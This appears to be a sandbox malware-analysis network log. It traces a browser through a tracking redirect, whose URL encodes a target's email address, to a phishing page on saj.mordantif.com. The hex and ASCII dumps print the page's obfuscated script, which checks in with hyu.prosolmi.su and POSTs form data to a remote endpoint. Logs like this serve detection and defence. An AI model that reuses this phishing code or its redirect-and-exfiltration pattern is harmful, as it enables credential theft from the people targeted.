                                                        X-Robots-Tag: noindex
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-9frOue0ytO_HypVBa1g6Iw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                        Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                        Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                        Permissions-Policy: unload=()
                                                        Date: Fri, 13 Sep 2024 13:06:26 GMT
                                                        Server: gws
                                                        Content-Length: 266
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close
                                                        2024-09-13 13:06:26 UTC266INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 6d 69 74 68 75 6e 61 61 64 73 2e 69 6e 2f 4d 2f 34 35 30 34 33 2f 61 47 46 75 63 79 35 68 62 6d 52 6c 63 6e 4e 76 62 6b 42 68 5a 79 35 7a 64 47 46 30 5a 53 35 74 62 69 35 31 63 77 3d 3d 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44
                                                        Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="http://mithunaads.in/M/45043/aGFucy5hbmRlcnNvbkBhZy5zdGF0ZS5tbi51cw==">here</A>.</BOD


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        2192.168.2.549718172.67.148.274433624C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-13 13:06:28 UTC683OUTGET /q8Yr/ HTTP/1.1
                                                        Host: saj.mordantif.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        sec-ch-ua-platform: "Windows"
                                                        Upgrade-Insecure-Requests: 1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: navigate
                                                        Sec-Fetch-Dest: document
                                                        Referer: http://mithunaads.in/
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-09-13 13:06:29 UTC1003INHTTP/1.1 200 OK
                                                        Date: Fri, 13 Sep 2024 13:06:29 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Cache-Control: no-cache, private
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eRGXoRvje70u9BGBvsZFqjO857f3bCC%2BRK1qcHFUaSqspuEXZ4zQvICFoMPe1EYEgRba1MHnIancAsdCFVcMnnUUmxBozADLxO%2FTo64IhAZoHtBVoK17WzrJXt3shA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        alt-svc: h3=":443"; ma=86400
                                                        Set-Cookie: XSRF-TOKEN=eyJpdiI6IlJpUXBjZXRpR2NEaitKT25XWjVXalE9PSIsInZhbHVlIjoiZ212N2ZTWUg5bFIvSldZblYrb3hydGVGV09qWDZSZUlxQ1ZXakhQWHNXZlhXTWgrSzN5aVdlVUZ2ZENtWmFZWFJmLzYrSXZyK2NRNUlqNDhvQ0kyemFzMWJBME5Dc1lnWnFUa3B2NUJiWTNhaWN0dHcycXBtTWZ0QVE0M0hPTTgiLCJtYWMiOiI3YmQ5OTcwNzgzYTUxZTE3M2EzY2ViYWMwOGYyZmExNDIzZTFjNWNhOGJlNmUxNmUyYmZmMGNlMDE0ZDMwMjUzIiwidGFnIjoiIn0%3D; expires=Fri, 13-Sep-2024 15:06:29 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                        2024-09-13 13:06:29 UTC518INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6b 39 4e 55 6a 4a 31 64 30 4a 45 4d 6c 5a 30 4d 48 46 74 54 44 52 69 51 58 51 72 56 47 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 51 57 35 71 64 43 39 71 62 57 78 70 61 55 63 7a 5a 6c 6c 34 57 57 35 45 54 6b 73 32 53 47 4e 34 52 54 4a 4b 63 33 68 69 55 55 46 6a 64 6d 68 46 51 57 52 7a 65 6d 70 4a 5a 6c 6c 4f 64 33 52 53 4d 31 5a 51 53 46 6c 57 61 79 74 73 57 6c 4e 33 53 33 68 54 5a 7a 68 4d 57 55 77 34 4e 6e 4a 43 54 32 70 34 57 58 6c 30 59 56 45 78 64 47 34 32 4e 48 5a 50 55 55 35 55 4b 30 70 52 65 55 56 72 56 48 6c 4f 63 30 74 58 4c 32 78 43 5a 31 5a 42 62 32 31 36 5a 30 73 31 64 6b 4e 51 57 48 4a 77 54 6b 45 78 65 45 67 32 4d 58 41
                                                        Data Ascii: Set-Cookie: laravel_session=eyJpdiI6Ik9NUjJ1d0JEMlZ0MHFtTDRiQXQrVGc9PSIsInZhbHVlIjoiQW5qdC9qbWxpaUczZll4WW5ETks2SGN4RTJKc3hiUUFjdmhFQWRzempJZllOd3RSM1ZQSFlWaytsWlN3S3hTZzhMWUw4NnJCT2p4WXl0YVExdG42NHZPUU5UK0pReUVrVHlOc0tXL2xCZ1ZBb216Z0s1dkNQWHJwTkExeEg2MXA
                                                        2024-09-13 13:06:29 UTC1369INData Raw: 31 39 36 31 0d 0a 3c 73 63 72 69 70 74 3e 66 65 74 63 68 28 27 68 74 74 70 73 3a 2f 2f 68 79 55 2e 70 72 6f 73 6f 6c 6d 69 2e 73 75 2f 33 30 33 30 39 39 34 34 31 30 37 34 33 34 33 43 66 4c 53 4d 48 4b 53 56 56 44 4b 49 46 59 58 4a 46 42 43 4d 47 4e 57 4c 4b 4c 57 55 43 58 58 41 58 42 52 58 4f 55 49 45 54 4d 51 4c 41 53 54 5a 56 27 2c 20 7b 0d 0a 6d 65 74 68 6f 64 3a 20 22 47 45 54 22 2c 0d 0a 7d 29 2e 74 68 65 6e 28 72 65 73 70 6f 6e 73 65 20 3d 3e 20 7b 0d 0a 72 65 74 75 72 6e 20 72 65 73 70 6f 6e 73 65 2e 74 65 78 74 28 29 0d 0a 7d 29 2e 74 68 65 6e 28 74 65 78 74 20 3d 3e 20 7b 0d 0a 69 66 28 74 65 78 74 20 3d 3d 20 30 29 7b 20 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 73 63 61 70 65
                                                        Data Ascii: 1961<script>fetch('https://hyU.prosolmi.su/303099441074343CfLSMHKSVVDKIFYXJFBCMGNWLKLWUCXXAXBRXOUIETMQLASTZV', {method: "GET",}).then(response => {return response.text()}).then(text => {if(text == 0){ document.write(decodeURIComponent(escape
                                                        2024-09-13 13:06:29 UTC1369INData Raw: 44 51 31 4a 74 64 45 74 6a 63 43 42 77 65 32 31 68 63 6d 64 70 62 69 31 30 62 33 41 36 4d 44 74 74 59 58 4a 6e 61 57 34 74 59 6d 39 30 64 47 39 74 4f 6a 46 79 5a 57 30 37 66 51 30 4b 49 33 42 4b 51 30 4e 53 62 58 52 4c 59 33 41 75 59 32 39 75 64 47 46 70 62 6d 56 79 65 33 64 70 5a 48 52 6f 4f 69 41 78 4d 44 41 6c 4f 33 42 68 5a 47 52 70 62 6d 63 74 63 6d 6c 6e 61 48 51 36 49 48 5a 68 63 69 67 74 4c 57 4a 7a 4c 57 64 31 64 48 52 6c 63 69 31 34 4c 43 41 75 4e 7a 56 79 5a 57 30 70 4f 33 42 68 5a 47 52 70 62 6d 63 74 62 47 56 6d 64 44 6f 67 64 6d 46 79 4b 43 30 74 59 6e 4d 74 5a 33 56 30 64 47 56 79 4c 58 67 73 49 43 34 33 4e 58 4a 6c 62 53 6b 37 62 57 46 79 5a 32 6c 75 4c 58 4a 70 5a 32 68 30 4f 69 42 68 64 58 52 76 4f 32 31 68 63 6d 64 70 62 69 31 73 5a 57
                                                        Data Ascii: DQ1JtdEtjcCBwe21hcmdpbi10b3A6MDttYXJnaW4tYm90dG9tOjFyZW07fQ0KI3BKQ0NSbXRLY3AuY29udGFpbmVye3dpZHRoOiAxMDAlO3BhZGRpbmctcmlnaHQ6IHZhcigtLWJzLWd1dHRlci14LCAuNzVyZW0pO3BhZGRpbmctbGVmdDogdmFyKC0tYnMtZ3V0dGVyLXgsIC43NXJlbSk7bWFyZ2luLXJpZ2h0OiBhdXRvO21hcmdpbi1sZW
                                                        2024-09-13 13:06:29 UTC1369INData Raw: 59 32 4e 6c 63 33 4e 6d 64 57 77 67 63 47 56 76 63 47 78 6c 49 47 46 79 5a 53 42 75 62 33 51 67 64 32 6c 73 62 47 6c 75 5a 79 42 30 62 79 42 6b 62 79 34 67 52 47 39 75 4a 69 4d 77 4d 7a 6b 37 64 43 42 33 61 58 4e 6f 49 47 6c 30 49 48 64 6c 63 6d 55 67 5a 57 46 7a 61 57 56 79 4f 79 42 33 61 58 4e 6f 49 48 6c 76 64 53 42 33 5a 58 4a 6c 49 47 4a 6c 64 48 52 6c 63 69 34 38 4c 32 52 70 64 6a 34 67 4c 53 30 2b 43 6a 77 76 61 47 56 68 5a 44 34 4e 43 67 30 4b 50 43 45 74 4c 53 42 54 64 57 4e 6a 5a 58 4e 7a 49 47 6c 7a 49 48 52 6f 5a 53 42 7a 64 57 30 67 62 32 59 67 63 32 31 68 62 47 77 67 5a 57 5a 6d 62 33 4a 30 63 79 77 67 63 6d 56 77 5a 57 46 30 5a 57 51 67 5a 47 46 35 49 47 6c 75 49 47 46 75 5a 43 42 6b 59 58 6b 67 62 33 56 30 4c 69 41 74 4c 54 34 4b 50 47 4a
                                                        Data Ascii: Y2Nlc3NmdWwgcGVvcGxlIGFyZSBub3Qgd2lsbGluZyB0byBkby4gRG9uJiMwMzk7dCB3aXNoIGl0IHdlcmUgZWFzaWVyOyB3aXNoIHlvdSB3ZXJlIGJldHRlci48L2Rpdj4gLS0+CjwvaGVhZD4NCg0KPCEtLSBTdWNjZXNzIGlzIHRoZSBzdW0gb2Ygc21hbGwgZWZmb3J0cywgcmVwZWF0ZWQgZGF5IGluIGFuZCBkYXkgb3V0LiAtLT4KPGJ
                                                        2024-09-13 13:06:29 UTC1369INData Raw: 6a 34 4e 43 6a 77 68 4c 53 30 67 53 57 59 67 65 57 39 31 49 48 4a 6c 59 57 78 73 65 53 42 73 62 32 39 72 49 47 4e 73 62 33 4e 6c 62 48 6b 73 49 47 31 76 63 33 51 67 62 33 5a 6c 63 6d 35 70 5a 32 68 30 49 48 4e 31 59 32 4e 6c 63 33 4e 6c 63 79 42 30 62 32 39 72 49 47 45 67 62 47 39 75 5a 79 42 30 61 57 31 6c 4c 69 41 74 4c 54 34 4b 50 47 6c 75 63 48 56 30 49 48 52 35 63 47 55 39 49 6d 68 70 5a 47 52 6c 62 69 49 67 61 57 51 39 49 6d 4a 73 64 47 52 6b 59 58 52 68 49 69 42 75 59 57 31 6c 50 53 4a 69 62 48 52 6b 5a 47 46 30 59 53 49 67 64 6d 46 73 64 57 55 39 49 69 49 2b 44 51 6f 38 49 53 30 74 49 44 78 6b 61 58 59 2b 55 33 56 6a 59 32 56 7a 63 79 42 70 63 79 42 75 62 33 51 67 64 47 68 6c 49 47 74 6c 65 53 42 30 62 79 42 6f 59 58 42 77 61 57 35 6c 63 33 4d 75
                                                        Data Ascii: j4NCjwhLS0gSWYgeW91IHJlYWxseSBsb29rIGNsb3NlbHksIG1vc3Qgb3Zlcm5pZ2h0IHN1Y2Nlc3NlcyB0b29rIGEgbG9uZyB0aW1lLiAtLT4KPGlucHV0IHR5cGU9ImhpZGRlbiIgaWQ9ImJsdGRkYXRhIiBuYW1lPSJibHRkZGF0YSIgdmFsdWU9IiI+DQo8IS0tIDxkaXY+U3VjY2VzcyBpcyBub3QgdGhlIGtleSB0byBoYXBwaW5lc3Mu
                                                        2024-09-13 13:06:29 UTC1029INData Raw: 41 69 4c 69 34 76 65 58 42 46 63 32 6c 4a 56 57 77 31 51 31 51 30 61 58 56 77 64 46 52 46 51 57 4a 68 65 46 5a 59 62 6a 68 61 4d 6d 70 71 64 32 51 30 54 46 46 68 63 58 52 69 64 31 70 68 55 30 52 4a 59 31 5a 6a 63 53 49 37 44 51 6f 67 49 43 41 67 5a 6d 56 30 59 32 67 6f 61 58 5a 72 65 45 78 75 56 57 56 71 55 43 77 67 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 74 5a 58 52 6f 62 32 51 36 49 43 4a 51 54 31 4e 55 49 69 77 4e 43 69 41 67 49 43 41 67 49 43 41 67 59 6d 39 6b 65 54 6f 67 62 6d 56 33 49 45 5a 76 63 6d 31 45 59 58 52 68 4b 46 70 68 53 6b 70 75 62 31 5a 33 52 6d 6f 70 44 51 6f 67 49 43 41 67 66 53 6b 75 64 47 68 6c 62 69 68 79 5a 58 4e 77 62 32 35 7a 5a 53 41 39 50 69 42 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 48 4a 6c 64 48 56 79 62 69 42 79 5a
                                                        Data Ascii: AiLi4veXBFc2lJVWw1Q1Q0aXVwdFRFQWJheFZYbjhaMmpqd2Q0TFFhcXRid1phU0RJY1ZjcSI7DQogICAgZmV0Y2goaXZreExuVWVqUCwgew0KICAgICAgICBtZXRob2Q6ICJQT1NUIiwNCiAgICAgICAgYm9keTogbmV3IEZvcm1EYXRhKFphSkpub1Z3RmopDQogICAgfSkudGhlbihyZXNwb25zZSA9PiB7DQogICAgICAgIHJldHVybiByZ
                                                        2024-09-13 13:06:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        3192.168.2.549717172.67.148.274433624C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-13 13:06:29 UTC1318OUTGET /favicon.ico HTTP/1.1
                                                        Host: saj.mordantif.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: image
                                                        Referer: https://saj.mordantif.com/q8Yr/
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: XSRF-TOKEN=eyJpdiI6IlJpUXBjZXRpR2NEaitKT25XWjVXalE9PSIsInZhbHVlIjoiZ212N2ZTWUg5bFIvSldZblYrb3hydGVGV09qWDZSZUlxQ1ZXakhQWHNXZlhXTWgrSzN5aVdlVUZ2ZENtWmFZWFJmLzYrSXZyK2NRNUlqNDhvQ0kyemFzMWJBME5Dc1lnWnFUa3B2NUJiWTNhaWN0dHcycXBtTWZ0QVE0M0hPTTgiLCJtYWMiOiI3YmQ5OTcwNzgzYTUxZTE3M2EzY2ViYWMwOGYyZmExNDIzZTFjNWNhOGJlNmUxNmUyYmZmMGNlMDE0ZDMwMjUzIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ik9NUjJ1d0JEMlZ0MHFtTDRiQXQrVGc9PSIsInZhbHVlIjoiQW5qdC9qbWxpaUczZll4WW5ETks2SGN4RTJKc3hiUUFjdmhFQWRzempJZllOd3RSM1ZQSFlWaytsWlN3S3hTZzhMWUw4NnJCT2p4WXl0YVExdG42NHZPUU5UK0pReUVrVHlOc0tXL2xCZ1ZBb216Z0s1dkNQWHJwTkExeEg2MXAiLCJtYWMiOiIyYmRlNWUwOTlkN2Q0MzI4ODFkNGRjZmQzNWNmZTZlZmVhYTUxZmE4YjUwMzcwOWQxMTczYzQxNjRjZDQ3Njc0IiwidGFnIjoiIn0%3D
                                                        2024-09-13 13:06:29 UTC642INHTTP/1.1 404 Not Found
                                                        Date: Fri, 13 Sep 2024 13:06:29 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Cache-Control: max-age=14400
                                                        Age: 11798
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oviTCtqZU1SvWh4Rb9n%2FdQhcqKkeIvf2bmDzToJChqBCMNP3uf8Lqv5FgwTCZfVju99wZWAt1%2F9Q0s%2Bke04dlTbPX8gsxFecebo7gI5ObjkBErCP8HtQP0qiDOy%2Fhw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Vary: Accept-Encoding
                                                        alt-svc: h3=":443"; ma=86400
                                                        CF-Cache-Status: HIT
                                                        Server: cloudflare
                                                        CF-RAY: 8c285ad8583019df-EWR
                                                        2024-09-13 13:06:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        4192.168.2.549719184.28.90.27443
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-13 13:06:29 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept: */*
                                                        Accept-Encoding: identity
                                                        User-Agent: Microsoft BITS/7.8
                                                        Host: fs.microsoft.com
                                                        2024-09-13 13:06:29 UTC467INHTTP/1.1 200 OK
                                                        Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                        Content-Type: application/octet-stream
                                                        ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                        Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                        Server: ECAcc (lpl/EF67)
                                                        X-CID: 11
                                                        X-Ms-ApiVersion: Distribute 1.2
                                                        X-Ms-Region: prod-neu-z1
                                                        Cache-Control: public, max-age=185964
                                                        Date: Fri, 13 Sep 2024 13:06:29 GMT
                                                        Connection: close
                                                        X-CID: 2


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        5192.168.2.54972135.190.80.14433624C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-13 13:06:30 UTC538OUTOPTIONS /report/v4?s=oviTCtqZU1SvWh4Rb9n%2FdQhcqKkeIvf2bmDzToJChqBCMNP3uf8Lqv5FgwTCZfVju99wZWAt1%2F9Q0s%2Bke04dlTbPX8gsxFecebo7gI5ObjkBErCP8HtQP0qiDOy%2Fhw%3D%3D HTTP/1.1
                                                        Host: a.nel.cloudflare.com
                                                        Connection: keep-alive
                                                        Origin: https://saj.mordantif.com
                                                        Access-Control-Request-Method: POST
                                                        Access-Control-Request-Headers: content-type
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-09-13 13:06:30 UTC336INHTTP/1.1 200 OK
                                                        Content-Length: 0
                                                        access-control-max-age: 86400
                                                        access-control-allow-methods: OPTIONS, POST
                                                        access-control-allow-origin: *
                                                        access-control-allow-headers: content-length, content-type
                                                        date: Fri, 13 Sep 2024 13:06:30 GMT
                                                        Via: 1.1 google
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        6192.168.2.549722184.28.90.27443
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-13 13:06:31 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept: */*
                                                        Accept-Encoding: identity
                                                        If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                        Range: bytes=0-2147483646
                                                        User-Agent: Microsoft BITS/7.8
                                                        Host: fs.microsoft.com
                                                        2024-09-13 13:06:31 UTC515INHTTP/1.1 200 OK
                                                        ApiVersion: Distribute 1.1
                                                        Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                        Content-Type: application/octet-stream
                                                        ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                        Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                        Server: ECAcc (lpl/EF06)
                                                        X-CID: 11
                                                        X-Ms-ApiVersion: Distribute 1.2
                                                        X-Ms-Region: prod-weu-z1
                                                        Cache-Control: public, max-age=185982
                                                        Date: Fri, 13 Sep 2024 13:06:31 GMT
                                                        Content-Length: 55
                                                        Connection: close
                                                        X-CID: 2
                                                        2024-09-13 13:06:31 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                        Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        7192.168.2.54972635.190.80.14433624C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-13 13:06:31 UTC478OUTPOST /report/v4?s=oviTCtqZU1SvWh4Rb9n%2FdQhcqKkeIvf2bmDzToJChqBCMNP3uf8Lqv5FgwTCZfVju99wZWAt1%2F9Q0s%2Bke04dlTbPX8gsxFecebo7gI5ObjkBErCP8HtQP0qiDOy%2Fhw%3D%3D HTTP/1.1
                                                        Host: a.nel.cloudflare.com
                                                        Connection: keep-alive
                                                        Content-Length: 429
                                                        Content-Type: application/reports+json
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-09-13 13:06:31 UTC429OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 31 31 36 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 73 61 6a 2e 6d 6f 72 64 61 6e 74 69 66 2e 63 6f 6d 2f 71 38 59 72 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 37 32 2e 36 37 2e 31 34 38 2e 32 37 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c
                                                        Data Ascii: [{"age":0,"body":{"elapsed_time":116,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://saj.mordantif.com/q8Yr/","sampling_fraction":1.0,"server_ip":"172.67.148.27","status_code":404,"type":"http.error"},"type":"network-error",
                                                        2024-09-13 13:06:31 UTC168INHTTP/1.1 200 OK
                                                        Content-Length: 0
                                                        date: Fri, 13 Sep 2024 13:06:30 GMT
                                                        Via: 1.1 google
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        8192.168.2.549723188.114.97.34433624C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-13 13:06:31 UTC612OUTGET /303099441074343CfLSMHKSVVDKIFYXJFBCMGNWLKLWUCXXAXBRXOUIETMQLASTZV HTTP/1.1
                                                        Host: hyu.prosolmi.su
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: */*
                                                        Origin: https://saj.mordantif.com
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://saj.mordantif.com/
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-09-13 13:06:31 UTC608INHTTP/1.1 200 OK
                                                        Date: Fri, 13 Sep 2024 13:06:31 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7OoP40A%2Fqa6BKP5sZHsjKyVirVoS6lmBG572O82qm6WA4wgbq60hHtILJaR%2BgU2BW7eDgC9BrRzIa7%2Bxs5Rh37%2BxMm23ffQvn3E9LjSYHst7awQR9LZiLYNSbvik2Oa5ccM%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8c285ae1f8707ca5-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        2024-09-13 13:06:31 UTC6INData Raw: 31 0d 0a 30 0d 0a
                                                        Data Ascii: 10
                                                        2024-09-13 13:06:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        9192.168.2.549729104.17.24.144433624C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-13 13:06:32 UTC651OUTGET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1
                                                        Host: cdnjs.cloudflare.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: */*
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: script
                                                        Referer: https://saj.mordantif.com/
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-09-13 13:06:32 UTC959INHTTP/1.1 200 OK
                                                        Date: Fri, 13 Sep 2024 13:06:32 GMT
                                                        Content-Type: application/javascript; charset=utf-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        Cache-Control: public, max-age=30672000
                                                        ETag: W/"61182885-40eb"
                                                        Last-Modified: Sat, 14 Aug 2021 20:33:09 GMT
                                                        cf-cdnjs-via: cfworker/kv
                                                        Cross-Origin-Resource-Policy: cross-origin
                                                        Timing-Allow-Origin: *
                                                        X-Content-Type-Options: nosniff
                                                        CF-Cache-Status: HIT
                                                        Age: 79691
                                                        Expires: Wed, 03 Sep 2025 13:06:32 GMT
